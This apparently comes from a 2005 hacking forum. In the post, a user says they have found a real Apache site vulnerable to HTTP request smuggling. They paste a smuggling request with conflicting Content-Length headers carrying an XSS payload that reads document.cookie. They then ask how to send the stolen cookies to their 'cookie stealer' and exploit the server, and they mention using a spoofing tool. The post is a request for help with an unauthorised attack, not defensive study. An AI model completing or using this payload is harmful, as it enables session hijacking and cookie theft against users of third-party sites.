Http request smuggling

Http request smuggling

10.10.2005, 20:58

caffine2

Новичок

Регистрация: 11.08.2005

Сообщений: 6

С нами: 10920260

Репутация: 0

Http request smuggling

Hi,
I found a site vulnerable to http request smuggling it runs an apache server. I have been looking up information on this all day yet the stuff that i find doesent explain it verry well! i know that it has to be sent to the site through packets but what i dont understand is how could i use

Код:

1 POST /some_script.jsp HTTP/1.0
2 Connection: Keep-Alive
3 Content-Type: application/x-www-form-urlencoded
4 Content-Length: 9
5 Content-Length: 204
6
7 this=thatPOST /vuln_page.jsp HTTP/1.0
8 Content-Type: application/x-www-form-urlencoded
9 Content-Length: 95
10
11 param1=value1&data=<script>alert("stealing%20your%20data:"%
2bdocument.cookie)</script>&foobar=

Now i know that does xss but how would i get that to redirect to my cookie stealer. also would that be what im looking for if i want to exploit the server ? well thank you for spending the time to read this (and i did check google for the information, but it didnt sufice)
sincerly
Crimson-Jolt

ps im using inet crack for spoofing

[/code]

𝕏 Twitter Reddit Telegram Копировать ссылку